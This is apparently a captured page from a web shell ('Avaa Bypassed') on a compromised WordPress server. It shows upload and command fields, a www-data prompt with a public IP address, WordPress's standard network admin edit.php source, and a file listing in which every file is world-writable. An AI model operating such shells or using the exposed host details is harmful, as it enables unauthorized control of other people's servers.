[ Avaa Bypassed ]




Upload:

Command:

www-data@18.117.10.159: ~ $
<?php
/**
 * Action handler for Multisite administration panels.
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.0.0
 */

/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';

$action = ( isset( $_GET['action'] ) ) ? $_GET['action'] : '';

if ( empty( $action ) ) {
	wp_redirect( network_admin_url() );
	exit;
}

/**
 * Fires just before the action handler in several Network Admin screens.
 *
 * This hook fires on multiple screens in the Multisite Network Admin,
 * including Users, Network Settings, and Site Settings.
 *
 * @since 3.0.0
 */
do_action( 'wpmuadminedit' );

/**
 * Fires the requested handler action.
 *
 * The dynamic portion of the hook name, `$action`, refers to the name
 * of the requested action derived from the `GET` request.
 *
 * @since 3.1.0
 */
do_action( "network_admin_edit_{$action}" );

wp_redirect( network_admin_url() );
exit;

Filemanager

Name Type Size Permission Actions
about.php File 245 B 0777
admin.php File 1 KB 0777
credits.php File 249 B 0777
edit.php File 908 B 0777
freedoms.php File 251 B 0777
index.php File 2.83 KB 0777
menu.php File 4.64 KB 0777
plugin-editor.php File 266 B 0777
plugin-install.php File 377 B 0777
plugins.php File 249 B 0777
privacy.php File 249 B 0777
profile.php File 254 B 0777
settings.php File 21.31 KB 0777
setup.php File 247 B 0777
site-info.php File 7.15 KB 0777
site-new.php File 9.2 KB 0777
site-settings.php File 5.44 KB 0777
site-themes.php File 6.61 KB 0777
site-users.php File 11.4 KB 0777
sites.php File 12.91 KB 0777
theme-editor.php File 264 B 0777
theme-install.php File 374 B 0777
themes.php File 15.84 KB 0777
update-core.php File 253 B 0777
update.php File 450 B 0777
upgrade.php File 4.82 KB 0777
user-edit.php File 253 B 0777
user-new.php File 4.97 KB 0777
users.php File 9.2 KB 0777